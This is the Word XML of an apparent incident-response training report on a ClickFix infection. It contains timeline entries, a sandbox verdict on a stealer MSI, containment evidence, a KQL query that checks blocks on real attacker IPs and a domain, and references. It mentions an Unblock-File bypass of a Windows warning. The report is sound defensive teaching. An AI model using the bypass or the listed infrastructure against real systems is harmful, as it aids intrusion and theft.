              <w:t xml:space="preserve">ilasm.exe, with no arguments, connects over HTTP to 31.56.19.29.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">BLOCKED</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> (reputation)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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2:22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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">12:30:55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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Third execution: query to ipinfo.io and HTTPS connection to smashshape.com.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">No block, no alert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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4:51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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">12:33:24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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The alert reaches the SOC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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ALERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000192">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000193">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Sandbox confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000194">
      <w:pPr>
        <w:spacing w:after="0" w:before="60" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The MSI was detonated in ANY.RUN (09/29/2026). The sandbox classified it as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">malicious activity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the tags ip-check, evasion and stealer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000195">
      <w:pPr>
        <w:spacing w:after="0" w:before="120" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="2590479"/>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486400" cy="2590479"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000196">
      <w:pPr>
        <w:spacing w:after="0" w:before="60" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2. MSI detonation in ANY.RUN.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000197">
      <w:pPr>
        <w:spacing w:after="0" w:before="120" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="4206240" cy="2529068"/>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06240" cy="2529068"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000198">
      <w:pPr>
        <w:spacing w:after="0" w:before="60" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3. Windows warning when opening the MSI outside the ClickFix chain: the script bypassed it with Unblock-File.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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gdc339hojzqr" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">APPENDIX D: EVIDENCE OF CONTROL IMPLEMENTATION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000169">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Status of the plan’s actions at the close of this report. Each piece of evidence carries a date and an owner; pending actions state which screenshot or query will close them.</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900"/>
        <w:gridCol w:w="3829"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3300"/>
            <w:gridCol w:w="1900"/>
            <w:gridCol w:w="38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AF">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Action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40" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</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1">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence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Isolate XXXX-01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Isolation order from Defender for Endpoint on 09/29 at 12:40 UTC; it took effect when the host reconnected. Owner: XXXX (SOC).</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Reset the user’s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Reset on 09/29. Owner: XXXX (client).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Revoke sessions and cookies in web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Screenshot of the revocation log for each service, with date and owner.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Block the infrastructure (IPs and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Screenshot of the indicators in Defender and on the firewall, plus the verification query below with no successful connections.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Detection rules (queries 1, 4 and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Screenshot of each rule in Sentinel with its name, creation date and exclusions.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Extension policy in Chrome and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Screenshot of chrome://policy and edge://policy on a sample host, with the policy applied.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">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Block verification:</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datetime(2026-09-29 12:40:00)</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RemoteIP in ("86.109.75.7", "31.56.19.29")</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or RemoteUrl has "smashshape.com"</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summarize Connections = count() by DeviceName, ActionType</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Expected result: no row with ActionType ConnectionSuccess after the block. If one shows up, the block is not applied on that host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019D">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6lvgsjnspqz" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">APPENDIX E: REFERENCES AND SOURCES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019E">
      <w:pPr>
        <w:spacing w:after="0" w:before="80" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>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Microsoft Digital Defense Report 2025. </w:t>
      </w:r>
      <w:hyperlink r:id="rIdLink101">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.microsoft.com/en-us/corporate-responsibility/cybersecurity/microsoft-digital-defense-report-2025/</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ESET. ESET Threat Report H1 2025 (2025). </w:t>
      </w:r>
      <w:hyperlink r:id="rIdLink102">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.welivesecurity.com/en/eset-research/eset-threat-report-h1-2025/</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Push Security. “The state of ClickFix, by detection data” (09/23/2026). </w:t>
      </w:r>
      <w:hyperlink r:id="rIdLink103">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://pushsecurity.com/blog/the-state-of-clickfix-by-detection-data</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CTM360, as reported by SecNews: 17,000 URLs with ClickFix pages (09/24/2026). </w:t>
      </w:r>
      <w:hyperlink r:id="rIdLink104">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.secnews.gr/en/735682/clickfix-istoselides-pagides-malware/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mrd0x. “FileFix - A ClickFix Alternative” (06/23/2025). </w:t>
      </w:r>
      <w:hyperlink r:id="rIdLink105">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://mrd0x.com/filefix-clickfix-alternative/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MITRE ATT&amp;CK. T1204.004 – User Execution: Malicious Copy and Paste. </w:t>
      </w:r>
      <w:hyperlink r:id="rIdLink106">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://attack.mitre.org/techniques/T1204/004/</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Splunk SURGe. “Introducing the PEAK Threat Hunting Framework” (2023). </w:t>
      </w:r>
      <w:hyperlink r:id="rIdLink107">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.splunk.com/en_us/blog/security/peak-threat-hunting-framework.html</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D. Bianco. “The Pyramid of Pain” (2013). </w:t>
      </w:r>
      <w:hyperlink r:id="rIdLink108">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html</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ODNI. Intelligence Community Directive 203: Analytic Standards. </w:t>
      </w:r>
      <w:hyperlink r:id="rIdLink109">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.dni.gov/files/documents/ICD/ICD-203.pdf</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Learn. Advanced hunting schema: DeviceRegistryEvents table. </w:t>
      </w:r>
      <w:hyperlink r:id="rIdLink110">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://learn.microsoft.com/en-us/defender-xdr/advanced-hunting-deviceregistryevents-table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Learn. about_Logging_Windows (Script Block Logging). </w:t>
      </w:r>
      <w:hyperlink r:id="rIdLink111">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows</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ANY.RUN. Our own analyses of 511.ps1 and the MSI (09/29/2026), with private visibility.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId10" w:type="default"/>
      <w:headerReference r:id="rId11" w:type="first"/>
      <w:footerReference r:id="rId12" w:type="default"/>
      <w:footerReference r:id="rId13" w:type="first"/>
      <w:pgSz w:h="16834" w:w="11909" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="1440" w:left="1440" w:right="1440" w:header="72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Mono Medium">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId5" w:subsetted="0"/>
    <w:embe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Mono">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId15" w:subsetted="0"/>
    <w:embe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b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
              <wp:extent cx="5841900" cy="54682"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:docPr id="1" name=""/>
              <a:graphic>
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvCnPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="2021550" y="3780000"/>
                        <a:ext cx="6648900" cy="0"/>
                      </a:xfrm>
                      <a:prstGeom prst="straightConnector1">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln cap="flat" cmpd="sng" w="19050">
                        <a:solidFill>
                          <a:srgbClr val="D8182F"/>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841900" cy="54682"/>
              <wp:effectExtent b="0" l="0" r="0" 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841900" cy="54682"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect"/>
                      <a:ln/>
                    </pic:spPr>
                  </pic:pic>
                </a:graphicData>
              </a:graphic>
            </wp:inline>
          </w:drawing>
        </mc:Fallback>
      </mc:AlternateConten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spacing w:after="0" w:lineRule="auto"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="d8182f"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:color w:val="d8182f"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">September 2026</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A5">
    <w:pPr>
      <w:spacing w:after="0" w:lineRule="auto"/>
      <w:jc w:val="right"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">TLP: CLEAR</w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A6">
    <w:pPr>
      <w:spacing w:after="0" w:lineRule="auto"/>
      <w:jc w:val="right"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A7">
    <w:pPr>
      <w:spacing w:after="0" w:lineRule="auto"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="eef0ff"/>
        <w:shd w:fill="22242a" w:val="clear"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="eef0ff"/>
        <w:shd w:fill="22242a" w:val="clear"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">This information may be distributed without restriction.</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A8">
    <w:pPr>
      <w:spacing w:after="0" w:lineRule="auto"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="eef0ff"/>
        <w:shd w:fill="22242a" w:val="clear"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="eef0ff"/>
        <w:shd w:fill="22242a" w:val="clear"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Training scenario based on an anonymized real incident: fictitious organization, users and hosts; real IOCs.</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A8">
    <w:pPr>
      <w:spacing w:after="0" w:lineRule="auto"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="eef0ff"/>
        <w:shd w:fill="22242a" w:val="clear"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="eef0ff"/>
        <w:shd w:fill="22242a" w:val="clear"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Material from the workshop “Writing the Incident Story” · DEATHCon 2026.</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A9">
    <w:pPr>
      <w:spacing w:after="0"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spacing w:after="0" w:lineRule="auto"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
              <wp:extent cx="5864550" cy="73743"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:docPr id="2" name=""/>
              <a:graphic>
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvCnPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="2021550" y="3780000"/>
                        <a:ext cx="6648900" cy="0"/>
                      </a:xfrm>
                      <a:prstGeom prst="straightConnector1">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln cap="flat" cmpd="sng" w="28575">
                        <a:solidFill>
                          <a:srgbClr val="1A1A1A"/>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864550" cy="73743"/>
              <wp:effectExtent b="0" l="0" r="0" t="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64550" cy="73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Style w:val="Title"/>
      <w:rPr/>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8vbxwbbt2lx0" w:id="19"/>
    <w:bookmarkEnd w:id="19"/>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
